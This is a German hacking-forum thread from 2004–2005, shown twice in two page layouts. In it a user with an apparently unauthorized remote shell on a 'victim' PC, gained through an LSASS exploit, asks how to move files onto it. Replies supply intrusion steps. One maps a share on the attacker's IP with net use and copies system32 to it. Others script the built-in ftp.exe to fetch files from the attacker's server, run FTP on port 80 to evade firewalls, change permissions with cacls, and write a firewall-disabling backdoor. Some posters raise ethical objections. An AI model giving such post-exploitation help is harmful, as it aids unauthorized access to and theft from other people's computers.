[HaBo]

SWiSH · 22.11.04, 19:25

Hi all,

also zunächst möchte ich mich mal kurz vorstellen, da dies meine erster Beitrag in diesem Forum ist. Also ich beschäftige mich seit etwa 6 Jahren mit Computern (da hab ich meinen ersten Rechner bekommen. Das war ein VTech :] ) und hab nun schon meine ersten Erfahrungen mit exploits gemacht. Dann beschäftige ich mich auch etwas mit Webdesign (hab aber ironischer weise NOCH keine fertige Homepage ).

Naja, nun zu meiner eigentlichen Frage:

Also ich hab jetzt auf nem Rechner ne Remote-Shell bekommen (sagen wir über lsass-exploit). Wie ist es nun möglich, dateien auf den Rechner zu laden??? wenn ich über ftp das machen will gehts nicht. Dann kommt erst "Benutzer eingeben" und dann nix mehr. Was kann ich tun? Könnte ich ne batch oder so schreiben und wenn ja wie?

Schon mal Danke für die Antworten im Vorraus

SWiSH

Riskman · 22.11.04, 19:54

xcopy

HaBo Ads

SWiSH · 22.11.04, 20:07

ähhm net so ausführlich

also soweit ich weiß, ist xcopy also ein befehl zum kopieren von dateien oder verzeichnissen.
Aber wenn ich in der Remote shell bin, kann ich doch nur auf dem PC des "Opfers" die Dateien kopieren oder? Was muss ich machen, um von MEINER Festplatte auf die des Opfers dateien zu kopieren ???

4future · 22.11.04, 21:25

da must du dir was anderes zur hand nehmen, telnet oder ssh ist auch nicht zum filetransfer gedacht... du brauchst eine serveranwendung... seis ein webserver, eine windows freigabe... ich nehm jetzt einfach mal an das ist eine windowskiste, du könntest vom remote komputer eine freigabe auf deinem server öffnen... seis mit net use Z: \\deinecomputerip\freigabename und dann könntest du xcopy C:\WIndows\system32\ Z:\unnötig\ machen.... oder du startest bei dir einen ftp server das wär am praktischsten sagen wir mal den lässt du auf port 80 hören (das ist auf den meisten firewalls frei) und dann kannst von remote auf draufconnecten... also du siehst schon es gibt viele möglichkeiten... würd dort mal ein bisschen erkunden z.B. gibt's firewalls usw.

viel spass... und ich hoff für dich das ist kein honeypod

22.11.04, 21:35

Mhm, eigentlich ein bissel komisch, wenn Du Dir eine Shell besorgen kannst, aber keine Idee hast, was man weiter damit machen soll. :-) Ich würde Dir mal raten, Dir erstmal einen Kopf darüber zu machen, ob es so sinnvoll ist, Dateien vom "eigenen" Rechner nachladen zu lassen bzw. den Exploit vom "eigenen" Rechner zu starten. Viel Spass beim Nachdenken.

MfG Rushjo

SWiSH · 23.11.04, 00:00

jo, hast ja recht. ist sicher etwas riskant. Aber 1. zerstöre ich keine daten und 2. wer sich net up to date hält, der ist selbst schult bzw. is kein pc freak. Und ich denke, wenn ich nichts schlimmes mache, wirds auch nich auffallen

Also das mit dem freigeben ist mir auch schon eingefallen, habs aber noch nich probiert.

Danke nochmal für die antworten

DocZimmermann · 23.11.04, 11:34

Ich kann nicht anders:

Zitat:

bzw. is kein pc freak.

Und wer nicht weiß wie er über eine Shell eine Datei laden kann ( Ob nun aus dem Netz oder local ) ist auch kein PC Freak und hat auch selber schuld!

Du machst also den User // Anwender dafür veantwortlich das der Hersteller des betriebssystems müll baut?!!
Ich nehme mal als Beispiel einen älteren Herren der sich noch mühe gibt im Internet Klar zu kommen der Glücklich und zufrieden mit seinem PC ist. Warum wilst du ihm die Schuld zustecken das er sich nicht weiter mit Sicherheit u.s.w. auseinander setzt?
Er vertraut auf sein OS, wo für er ja schließlich Geld bezahlt hat! ( Naja hat aufs falsche Pferd gesetzt aber egal ). Die Schuld liegt da eindeutig beim Hersteller des OS.
Da hast du die falsche einstellung.
Wenn du nichts böses vorhast na dann bau in ein script in die Autostart die automatisch die windows update seite aufruft.

TheDoc

SWiSH · 23.11.04, 13:56

jop, du hast sicher Recht, dass es ehr an Microsoft leigt. Aber es ist ja auch meine Absicht, bei demjenigen Lücken zu schließen (aber ich kanns eben noch net). 1. Macht das Fun und 2. bring dem das auch was. Aber dazu muss ich eben dateien hochladen. Ich werde das mit der Freigabe gleich ausprobieren

. Und wenn du mal meine Mutter fragst, ob ich ein PC-Freak bin, dann wird die dir sicher was anderes erzählen

. Ich bin sicher kein Hacker, aber auch kein Kiddie. Das Wissen eines Hackers ist ja nich alles, was einen Hacker ausmacht (Hacker != Cracker). Aber es ist immer noch ein Teil des Hackens und das kommt einem nicht einfach so zugeflogen. Also dass ich noch viel lernen muss is klar (bin ja auch noch jung

) Aber ich weiß ja auch schon relativ viel...

EDIT: Das mit dem PC-Freak war ja auch ehr so gemeint, dass dem das sicher nicht auffallen wird, wenn ich keinen mist baue. (und er mich somit auch nicht anzeigt ... hoff ich...)

t3rr0r.bYt3 · 23.11.04, 14:18

bevordas jetz in eine grundsatz-diskussion ausartet:

du erinnerst dich doch sicher an den windows-internen ftp-client (ftp.exe)..
den könnte man ja missbrauchen..

und weil man den nicht aufm desktop hat und nix eintippen kann (ich meine den ftp.exe auf der opferrechner), muss der sich die infos woanders herholen.. z.b. aus einer text-datei (z.b. mit dos-befehlen

)

im klartext: schreib ne batch, die alle anweisungen enthält (connect zu deinem homeFTP/pub/was-auch-immer; login-infos; zu holende files) und starte dann ftp.exe mit, das dieses file einlesen soll..

sicarius · 12.12.05, 19:24

hm... ich weiß nicht genau,
ab welcher windows version die net-befehle
benutzt werden können,
aber sonst könntest du doch die nehmen...

"net share" um nen ordner freizugeben (per netbios)
"net use" um per shell ein netzlaufwerk zu mounten (auch netbios ^^)

...also das wäre jedenfalls mein ansatz...
-> und wenn dir die zugriffsrecht fehlen,
kannste die unter ntfs-dateisystem mit cacls ändern...

benwilliam · 12.12.05, 19:42

schon mal auf das erstelldatum geachtet??

_fux_ · 12.12.05, 22:45

also oder du bist ganz krass und schreibst dir schnell mal nen kleinen backdoor, der dann die firewall auser kraft setzt und anschließend erkennt, welches es war und die tray icon ersetzt... gerade unter windows ist sowas ja noch ohne weiteres möglich.

rofl jetzt grad wo obe drüber steht " schonmal auf das erstellungsdatum geachtet"

omg *g

Empfehlung

22.11.04, 19:25	#1 (permalink)
SWiSH Registriert seit: 22.11.04 Likes: 0	Was machen, wenn ich ne Remote-Shell hab? Hi all, also zunächst möchte ich mich mal kurz vorstellen, da dies meine erster Beitrag in diesem Forum ist. Also ich beschäftige mich seit etwa 6 Jahren mit Computern (da hab ich meinen ersten Rechner bekommen. Das war ein VTech :] ) und hab nun schon meine ersten Erfahrungen mit exploits gemacht. Dann beschäftige ich mich auch etwas mit Webdesign (hab aber ironischer weise NOCH keine fertige Homepage ). Naja, nun zu meiner eigentlichen Frage: Also ich hab jetzt auf nem Rechner ne Remote-Shell bekommen (sagen wir über lsass-exploit). Wie ist es nun möglich, dateien auf den Rechner zu laden??? wenn ich über ftp das machen will gehts nicht. Dann kommt erst "Benutzer eingeben" und dann nix mehr. Was kann ich tun? Könnte ich ne batch oder so schreiben und wenn ja wie? Schon mal Danke für die Antworten im Vorraus SWiSH

12.12.05, 22:45	#12 (permalink)
_fux_ Registriert seit: 13.09.05 Likes: 5	also oder du bist ganz krass und schreibst dir schnell mal nen kleinen backdoor, der dann die firewall auser kraft setzt und anschließend erkennt, welches es war und die tray icon ersetzt... gerade unter windows ist sowas ja noch ohne weiteres möglich. rofl jetzt grad wo obe drüber steht " schonmal auf das erstellungsdatum geachtet" omg *g __________________ und?

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln

Ähnliche Themen
Thema	Autor	Forum	Antworten	Letzter Beitrag
Was würdet ihr machen wenn ihr Millionär wärt?	pfaffi7	Umfragen	66	09.08.09 15:07
DCOM RPC Remote Shell	HackJack	(In)security allgemein	9	30.05.05 21:34
Was machen wenn die Freundin unbedingt Tanzen will	Crypt	HaBo Lounge	8	10.12.03 13:19
Securen von NT/Shell für remote installieren ?	nickless	Windows	4	06.05.03 15:23
REMOTE SHELL in C++	Rushjo	Code Kitchen	11	22.12.02 23:11

22.11.04, 19:54	#2 (permalink)
Riskman Registriert seit: 21.08.03 Likes: 0	xcopy

22.11.04, 20:07	#3 (permalink)
SWiSH Themenstarter Registriert seit: 22.11.04 Likes: 0	ähhm net so ausführlich also soweit ich weiß, ist xcopy also ein befehl zum kopieren von dateien oder verzeichnissen. Aber wenn ich in der Remote shell bin, kann ich doch nur auf dem PC des "Opfers" die Dateien kopieren oder? Was muss ich machen, um von MEINER Festplatte auf die des Opfers dateien zu kopieren ???

22.11.04, 21:25	#4 (permalink)
4future Registriert seit: 07.05.03 Likes: 0	da must du dir was anderes zur hand nehmen, telnet oder ssh ist auch nicht zum filetransfer gedacht... du brauchst eine serveranwendung... seis ein webserver, eine windows freigabe... ich nehm jetzt einfach mal an das ist eine windowskiste, du könntest vom remote komputer eine freigabe auf deinem server öffnen... seis mit net use Z: \\deinecomputerip\freigabename und dann könntest du xcopy C:\WIndows\system32\ Z:\unnötig\ machen.... oder du startest bei dir einen ftp server das wär am praktischsten sagen wir mal den lässt du auf port 80 hören (das ist auf den meisten firewalls frei) und dann kannst von remote auf draufconnecten... also du siehst schon es gibt viele möglichkeiten... würd dort mal ein bisschen erkunden z.B. gibt's firewalls usw. viel spass... und ich hoff für dich das ist kein honeypod

22.11.04, 21:35	#5 (permalink)
Rushjo Guest Likes:	Mhm, eigentlich ein bissel komisch, wenn Du Dir eine Shell besorgen kannst, aber keine Idee hast, was man weiter damit machen soll. :-) Ich würde Dir mal raten, Dir erstmal einen Kopf darüber zu machen, ob es so sinnvoll ist, Dateien vom "eigenen" Rechner nachladen zu lassen bzw. den Exploit vom "eigenen" Rechner zu starten. Viel Spass beim Nachdenken. MfG Rushjo

23.11.04, 00:00	#6 (permalink)
SWiSH Themenstarter Registriert seit: 22.11.04 Likes: 0	jo, hast ja recht. ist sicher etwas riskant. Aber 1. zerstöre ich keine daten und 2. wer sich net up to date hält, der ist selbst schult bzw. is kein pc freak. Und ich denke, wenn ich nichts schlimmes mache, wirds auch nich auffallen Also das mit dem freigeben ist mir auch schon eingefallen, habs aber noch nich probiert. Danke nochmal für die antworten

23.11.04, 13:56	#8 (permalink)
SWiSH Themenstarter Registriert seit: 22.11.04 Likes: 0	jop, du hast sicher Recht, dass es ehr an Microsoft leigt. Aber es ist ja auch meine Absicht, bei demjenigen Lücken zu schließen (aber ich kanns eben noch net). 1. Macht das Fun und 2. bring dem das auch was. Aber dazu muss ich eben dateien hochladen. Ich werde das mit der Freigabe gleich ausprobieren . Und wenn du mal meine Mutter fragst, ob ich ein PC-Freak bin, dann wird die dir sicher was anderes erzählen . Ich bin sicher kein Hacker, aber auch kein Kiddie. Das Wissen eines Hackers ist ja nich alles, was einen Hacker ausmacht (Hacker != Cracker). Aber es ist immer noch ein Teil des Hackens und das kommt einem nicht einfach so zugeflogen. Also dass ich noch viel lernen muss is klar (bin ja auch noch jung ) Aber ich weiß ja auch schon relativ viel... EDIT: Das mit dem PC-Freak war ja auch ehr so gemeint, dass dem das sicher nicht auffallen wird, wenn ich keinen mist baue. (und er mich somit auch nicht anzeigt ... hoff ich...)

23.11.04, 14:18	#9 (permalink)
t3rr0r.bYt3 Senior Member Registriert seit: 07.01.03 Likes: 13	bevordas jetz in eine grundsatz-diskussion ausartet: du erinnerst dich doch sicher an den windows-internen ftp-client (ftp.exe).. den könnte man ja missbrauchen.. und weil man den nicht aufm desktop hat und nix eintippen kann (ich meine den ftp.exe auf der opferrechner), muss der sich die infos woanders herholen.. z.b. aus einer text-datei (z.b. mit dos-befehlen ) im klartext: schreib ne batch, die alle anweisungen enthält (connect zu deinem homeFTP/pub/was-auch-immer; login-infos; zu holende files) und starte dann ftp.exe mit, das dieses file einlesen soll..

12.12.05, 19:24	#10 (permalink)
sicarius Registriert seit: 11.06.05 Likes: 0	hm... ich weiß nicht genau, ab welcher windows version die net-befehle benutzt werden können, aber sonst könntest du doch die nehmen... "net share" um nen ordner freizugeben (per netbios) "net use" um per shell ein netzlaufwerk zu mounten (auch netbios ^^) ...also das wäre jedenfalls mein ansatz... -> und wenn dir die zugriffsrecht fehlen, kannste die unter ntfs-dateisystem mit cacls ändern...

12.12.05, 19:42	#11 (permalink)
benwilliam Registriert seit: 16.07.05 Likes: 0	schon mal auf das erstelldatum geachtet??


HaBo Ads HaBOT

[HaBo]

Was machen, wenn ich ne Remote-Shell hab?